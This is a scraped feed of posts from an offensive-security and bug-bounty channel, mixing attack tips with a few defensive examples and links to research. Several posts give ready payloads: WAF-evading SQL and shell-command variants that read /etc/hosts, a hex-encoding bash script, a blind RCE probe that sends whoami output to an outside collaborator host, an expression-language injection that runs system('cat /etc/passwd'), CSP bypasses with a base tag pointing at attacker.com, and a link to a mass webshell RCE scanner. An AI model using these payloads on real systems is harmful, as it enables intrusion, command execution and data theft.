🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
⚡️Outdated but Helpful: Some MySQL tricks to break some #WAFs out there. ⚔️ by @BRuteLogic
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#infosec #cybersec #bugbountytips
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
✅https://github.com/ill-deed/CVE-2025-34085-Multi-target
Hey Hunters,
DarkShadow here back again!
☠️Blind Remote Code Execution🔥
✅POC: [Preferred format]
curl -X POST -d "user=$(whoami)" http://BURP_LINK
Other formats you might try:
curl whoami.BURP_LINK
curl $(whoami).BURP_LINK
Sometimes targets might be vulnerable but not give you the output, so never forget to try your Burp Collaborator to get the output.
NOTICE: always check the User-Agent header in your Burp Collaborator responses; if you see curl there, it means RCE.
Now you hit follow me for more: x.com/darkshadow2bd
Guys, I need your review... I have created an AI to generate vibe coding prompts and made it open source. Please check it out and let me know your review.
https://github.com/Addy-shetty/Vibe-Prompting
I have one question... Is anyone here learning vibe coding?
#DevOps
#Tech_book
"Java Spring Bug Hunter's Secure Coding Playbook:
Java Spring Security with SAST Arsenal from Semgrep to Claude", 2025.
// Java Spring security in 2025 - a high-stakes game where a single misconfigured bean or an overlooked deserialization endpoint can become the gateway for sophisticated attackers...
#tools
#WLAN_Security
"Crowdsourcing Bluetooth identity, to understand Bluetooth vulnerability", DistrictCon 2025.
]-> Repo
]-> BlueTooth Information Data Exchange
]-> Blue2thprinting Code
// Disclaimer
#AppSec
#WebApp_Security
1. Critical UXSS in Opera Browser
https://medium.com/@renwa/when-ctf-meets-bug-bounty-a-critical-uxss-in-opera-browser-ee16f389e555
// Leak open tab URLs (flag included)
2. Subverting code integrity checks to locally backdoor Signal, 1Password, Slack, and more
https://blog.trailofbits.com/2025/09/03/subverting-code-integrity-checks-to-locally-backdoor-signal-1password-slack-and-more
// deep dive into Electron CVE-2025-55305
3. RCE through vulnerability in Facebook Messenger for Windows
https://www.vulnano.com/2025/09/remote-code-execution-though.html
// Attacker: Pixel Fold, Android 14. Victim: Windows 11 Home 22H
#Space_Security
#WLAN_Security
"GPS Spoofing Attacks on Automated Frequency Coordination System in Wi-Fi 6E and Beyond", 2025.
// ..we demonstrate that GPS-based location reporting, which Wi-Fi APs use, can be spoofed using inexpensive, off-the-shelf radio equipment. This enables attackers to manipulate AP behavior, gain unauthorized spectrum access, cause harmful interference, or disable APs entirely by spoofing them into foreign locations
See also:
]-> GNSS-WASP: GNSS Wide Area SPoofing (.pdf)
Free Recon Course and Methodology For Bug Bounty Hunters
https://www.youtube.com/watch?v=evyxNUzl-HA
Web Cache Poisoning
small✅ checklist
Read Full Article: https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a
• Test X-Forwarded-*, X-Host, X-Original-URL, User-Agent for reflection.
• Check Vary and target UA-specific poisoning when relevant.
• Try encoded dot-segments (%2e%2e, %2f, %5c) and observe X-Cache
• Test .css / .js extension flip on sensitive endpoints (CSPT)
• Seed cache via Burp parallel requests (first .js then main HTML)
• Use fresh IPs, low request rate, and record X-Cache, Age, CF-Cache-Status
• Run delimiter discovery (append random suffix → insert delimiter → compare).
🔥 SSRF hunters — 3 tiny tricks that turn “maybe” into provable (one-request) POCs — read the full playbook👇
• ⏱️ Timing-delay
• 🔁 Subdomain-rotation
• 🏷️ Header-correlation
Read the full Medium guide ➡️ https://medium.com/@Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015
First, understand this :
Content Security Policy = No XSS
It just means "XSS with extra steps"
🟩 : 70% of CSPs I encounter have misconfigurations that make them completely useless. #bugbounty #infosec
Here are the 👇 5 deadly mistakes developers make:
Mistake #1: 'unsafe-inline'
If you see this in script-src, you've already won.
Policy: script-src 'self' 'unsafe-inline'
Bypass: <script>alert(1)</script>
It literally allows ALL inline scripts.
Mistake #2: Wildcard Domains (*.google.com)
"It's Google, what could go wrong?"
Everything.
This JSONP endpoint on Google works on tons of apps: http://accounts.google.com/o/oauth2/revoke?callback=alert
Mistake #3: Missing base-uri
This is my favorite because it's ALWAYS overlooked.
Inject: <base href="https://attacker.com">
Now ALL relative script paths load from your domain.
Mistake #4: File Uploads on Whitelisted Domains
Policy: script-src 'self' http://cdn.example.com
If you can upload files to that CDN → game over.
Upload a .js file disguised as a profile picture. Direct S3 URL. Loaded as script.
Mistake #5: Trusting CDNs with Old Libraries
AngularJS versions < 1.6.0 have sandbox escapes.
If a whitelisted domain hosts old Angular → you can execute code.
Check http://ajax.googleapis.com for old versions. This works more often than you'd think.
This is just the beginning.
Part 2: Advanced nonce exploitation, AngularJS escapes, service workers
Part 3: DOM clobbering, mutation XSS, scriptless attacks
Full guide + testing checklist:
https://medium.com/@Aacle/a-bug-hunters-guide-to-csp-bypasses-part-1-69b606fd2699
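A static check for the five patterns listed in the post above, as an added example (not the post's code): it parses a Content-Security-Policy header and flags 'unsafe-inline' with no nonce or hash beside it, wildcard and scheme-only sources, hosts from a small risky-host set, and a missing base-uri. The RISKY_HOSTS set and the policies it is run on are constructed assumptions.

```python
import re

# Allow-listed hosts the post singles out (JSONP callback endpoints, old-library CDNs).
# Assumption: extend this set with any host that serves user uploads (mistake #4).
RISKY_HOSTS = {"*.google.com", "accounts.google.com", "ajax.googleapis.com"}


def parse_csp(header: str) -> dict:
    """'a b; c d' -> {'a': ['b'], 'c': ['d']}; a repeated directive is ignored, as in browsers."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens and tokens[0].lower() not in policy:
            policy[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return policy


def host_of(source: str) -> str:
    """Strip scheme, port and path from a host-source expression."""
    return re.sub(r"^[a-z][a-z0-9+.-]*://", "", source).split("/")[0].split(":")[0]


def audit_csp(header: str) -> list:
    """Return one finding string per weak pattern found in the script sources."""
    p = parse_csp(header)
    script_src = p.get("script-src", p.get("default-src", []))  # script-src falls back to default-src
    findings = []
    # Mistake #1: 'unsafe-inline' runs any injected <script>, unless a nonce/hash makes browsers ignore it.
    nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in script_src)
    if "'unsafe-inline'" in script_src and not nonce_or_hash:
        findings.append("unsafe-inline: any injected <script> runs")
    for src in script_src:
        if src.startswith("'"):
            continue  # keyword, nonce or hash, not a host
        host = host_of(src)
        # Mistake #2: wildcard or scheme-only sources admit every matching host.
        if src in ("*", "http:", "https:", "data:") or host.startswith("*."):
            findings.append(f"wildcard source: {src}")
        # Mistakes #2 and #5: hosts known to expose JSONP callbacks or old AngularJS builds.
        for risky in RISKY_HOSTS:
            if host == risky or (risky.startswith("*.") and host.endswith(risky[1:])):
                findings.append(f"risky host: {src}")
                break
    # Mistake #3: without base-uri an injected <base href> rewrites every relative script URL.
    if "base-uri" not in p:
        findings.append("base-uri missing")
    return findings
```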
This book is for understanding how APIs work and are developed.
Hey Hunters,
DarkShadow here back again, dropping a really interesting bypass method!
❎WAF block: whoami
✅WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'
✨Bash script:
#!/bin/bash
# Usage: ./hexify.sh <string>
# Rewrites every character of the argument as a \xNN escape inside a $'...' ANSI-C quoted string.
str="$1"
out=""
for ((i=0; i<${#str}; i++)); do
char="${str:i:1}"
ascii=$(printf '%d' "'$char")   # numeric code of the character
hex=$(printf '%02x' "$ascii")   # as two hex digits
out="${out}\\x${hex}"
done
echo "$'$out'"
Hey Hunters,
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
❌ cat /etc/hosts
✅ tac /e\t\c/h\o\s\t\s
✅ tac${IFS}/e\t\c/h\o\s\t\s
✅ tac /e*c/h*st*
✅ tac /e{t,c}*/{o,h}*s*{s,t}
✅ tac /??c/??sts
Let me know, guys, whether you all want more like that or not.
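The two posts above rely on quoting tricks ($'\xNN' strings, stray backslashes, ${IFS}, braces and globs) that defeat naive string matching in a WAF or in command-line logging. The following added example, not DarkShadow's code, normalises a captured command line the way the shell would before matching its arguments against a watchlist of sensitive paths; the watchlist and the sample commands are constructed.

```python
import re
from fnmatch import fnmatchcase

ESCAPES = {"n": "\n", "t": "\t", "\\": "\\", "'": "'"}  # the $'...' escapes handled here


def decode_ansi_c(body: str) -> str:
    """Decode the body of a bash $'...' string: \\xNN plus the single-letter escapes above."""
    def sub(m):
        return chr(int(m.group(1), 16)) if m.group(1) else ESCAPES.get(m.group(2), m.group(2))
    return re.sub(r"\\x([0-9a-fA-F]{2})|\\(.)", sub, body)


def expand_braces(word: str) -> list:
    """Bash brace expansion: '/e{t,c}x' -> ['/etx', '/ecx'] (several groups handled by recursion)."""
    m = re.search(r"\{([^{}]*,[^{}]*)\}", word)
    if not m:
        return [word]
    out = []
    for alt in m.group(1).split(","):
        out.extend(expand_braces(word[:m.start()] + alt + word[m.end():]))
    return out


def normalize_command(cmd: str) -> str:
    """Undo the quoting tricks so a rule written for 'tac /etc/hosts' sees that text."""
    cmd = re.sub(r"\$'((?:\\.|[^'\\])*)'", lambda m: decode_ansi_c(m.group(1)), cmd)  # $'\x77..' -> whoami
    cmd = re.sub(r"\$\{IFS\}|\$IFS", " ", cmd)  # ${IFS} is just a field separator
    cmd = re.sub(r"\\(.)", r"\1", cmd)  # an unquoted backslash is dropped: /e\t\c -> /etc
    return " ".join(cmd.split())


def sensitive_paths_referenced(cmd: str, watchlist=("/etc/passwd", "/etc/hosts", "/etc/shadow")) -> list:
    """Globs cannot be expanded without the target's filesystem, so match each argument
    as a pattern against the watchlist instead (pattern -> path direction)."""
    hits = []
    for token in normalize_command(cmd).split():
        for pattern in expand_braces(token):
            for path in watchlist:
                if fnmatchcase(path, pattern) and path not in hits:
                    hits.append(path)
    return hits
```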
Hey Hunters,
DarkShadow here back again, dropping another of the easiest ways to get critical bugs!
If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.
✅POC Payload:
1. Change the Method GET to POST
2. Language={${system("cat+/etc/passwd")}}
CACHE POISONING QUICK WIN:
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
• CDN: Reads first → Allows ✅
• App: Reads last → Injects
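A server-side check that closes the first-vs-last gap described above, as an added example (not the post's code): the application accepts X-Forwarded-Host only from its own edge, requires the whole header value to be one allow-listed bare hostname, and otherwise falls back to Host and then to the canonical name instead of picking an element. ALLOWED_HOSTS, the canonical name and the sample headers are constructed; header names are looked up case-sensitively for brevity.

```python
import re

# Constructed allow-list; in practice this is the set of hostnames the app is served on.
ALLOWED_HOSTS = {"legit.com", "www.legit.com"}
# One bare FQDN with an optional port: no scheme, no path, no comma-separated list.
HOST_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}(?::\d{1,5})?$")


def validate_host_header(value, allowed=ALLOWED_HOSTS):
    """Return the allow-listed hostname the header names, or None if it is anything else."""
    if value is None:
        return None
    v = value.strip().lower()
    if not HOST_RE.match(v):  # 'http://legit.com, http://evil.com' fails here as a whole
        return None
    host = v.split(":")[0]  # drop the port; IPv6 literals are excluded by HOST_RE
    return host if host in allowed else None


def effective_host(headers, allowed=ALLOWED_HOSTS, canonical="legit.com", proxy_trusted=False):
    """Host to use for URL generation and for the cache key.
    X-Forwarded-Host counts only when the request arrived through our own edge (proxy_trusted);
    a rejected header falls back to Host, then to the canonical name, never to 'the last element'."""
    if proxy_trusted:
        forwarded = validate_host_header(headers.get("X-Forwarded-Host"), allowed)
        if forwarded:
            return forwarded
    return validate_host_header(headers.get("Host"), allowed) or canonical
```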
New bug bounty resource 🚀
The Cache Poisoning Bible - Part 1: Advanced Fundamentals
Everything I wish I knew when I started:
• Cache key architectures
• CDN comparison guide
• Advanced detection methods
• Real-world patterns
https://medium.com/@Aacle/the-cache-poisoning-bible-part-1-advanced-fundamentals-2c8e9d7be2e9
#DFIR
#AIOps
#MLSecOps
#RAG_Security
AI Incident Response Framework, V1.0
https://github.com/cosai-oasis/ws2-defenders/blob/main/incident-response/AI%20Incident%20Response.md
// This guides defenders on proactively minimizing the impact of AI system exploitation. It details how to maintain auditability, resiliency, and rapid recovery even when a system is compromised by advanced threat actors. Also explores the unique challenges of AI incident response, emphasizing the role of forensic investigation and the complications introduced by agentic architectures, while providing concrete steps to manage this new complexity
#exploit
"Exploiting the Impossible:
A Deep Dive into A Vulnerability Apple Deems Unexploitable", NullCon Berlin 2025.
]-> https://jhftss.github.io/Exploiting-the-Impossible
]-> PoC
// race condition in Apple core file-copy API (CVE-2024-54566, CVE-2025-43220)
#DevOps
#MLSecOps
#Whitepaper
"DoD Artificial Intelligence Cybersecurity Risk Management Tailoring Guide", Ver.2, July 2025.
// This guidance applies to any AI system used or operated by DoD Components and presents tailored guidance for system owners and authorizing officials to use when authorizing an AI system for operational use
#AIOps
#MLSecOps
"Cybersecurity AI: Hacking the AI Hackers via Prompt Injection", Aug. 2025.
]-> Prompt injection mitigation
// We present PoC exploits against the Cybersecurity AI (CAI) framework and its CLI tool, and detail our mitigations against such attacks in a multi-layered defense implementation
https://github.com/DivyanshGoel259/Churn-Prediction
Finally, our first ANN project, in which we trained a model for "Churn Prediction".
Part - 2
Web Cache Poisoning
Quick tip: test X-Forwarded-Host + extension flips (.css/.js) — if the edge caches your reflected header or JSON as a “static” asset, every visitor can get poisoned JS or tokens.
Read 5 practical PoCs & seeding recipes →
https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a
Web Cache Poisoning Tips
Attacker mindset — don’t bruteforce: look for what the cache keys include. Host headers, cookies, query strings, Accept headers, and odd edge-case headers often end up in the key.
Make the app include your input in the key → you control cached output.
Read Full Article: https://medium.com/@Aacle/web-cache-poisoning-part-1-understanding-the-beast-d303f1741e48
How to Hack JWT using Burp Suite?
https://payatu.com/blog/jwt-vulnerabilities/
🔐 *How to Secure Your APIs – A Practical Guide*
APIs are the backbone of modern apps — but without security, they become open doors to attacks. Here's how to lock them down effectively:
---
✅ *1. Use Authentication & Authorization*
- Implement *OAuth2*, *JWT*, or *API keys*
- Enforce *role-based access control (RBAC)*
---
🔐 *2. Validate Inputs Strictly*
- Sanitize user inputs
- Use strong data validation (e.g., Joi, Yup)
- Prevent SQL & NoSQL injection
---
📦 *3. Rate Limiting & Throttling*
- Control request frequency to avoid abuse
- Use tools like *NGINX*, *API Gateway*, or *Cloudflare*
---
📜 *4. Use HTTPS Everywhere*
- Encrypt all data in transit
- Never expose APIs over HTTP
---
🕵️♂️ *5. Monitor & Log*
- Track unusual behavior
- Use centralized logging (e.g., ELK, Datadog)
---
🧱 *6. CORS & Firewall Rules*
- Restrict allowed origins
- Protect using *WAFs* and IP whitelisting
---
Secure APIs = Safe apps + Protected data + Trusted users
Build smart. Build safe.
🌐A big curated list of awesome resources useful during Penetration testing, Vulnerability assessments, Red/Blue Team operations, Bug Bounty and more🧠
Online tools for search info about:
- exploit⭐️
- vulnerabilities⭐️
- people⭐️
- emails⭐️
- phone numbers⭐️
- domains⭐️
- certificates⭐️
and more❤️.
https://github.com/edoardottt/awesome-hacker-search-engines
Learn Hacking from Basic to Pro❤️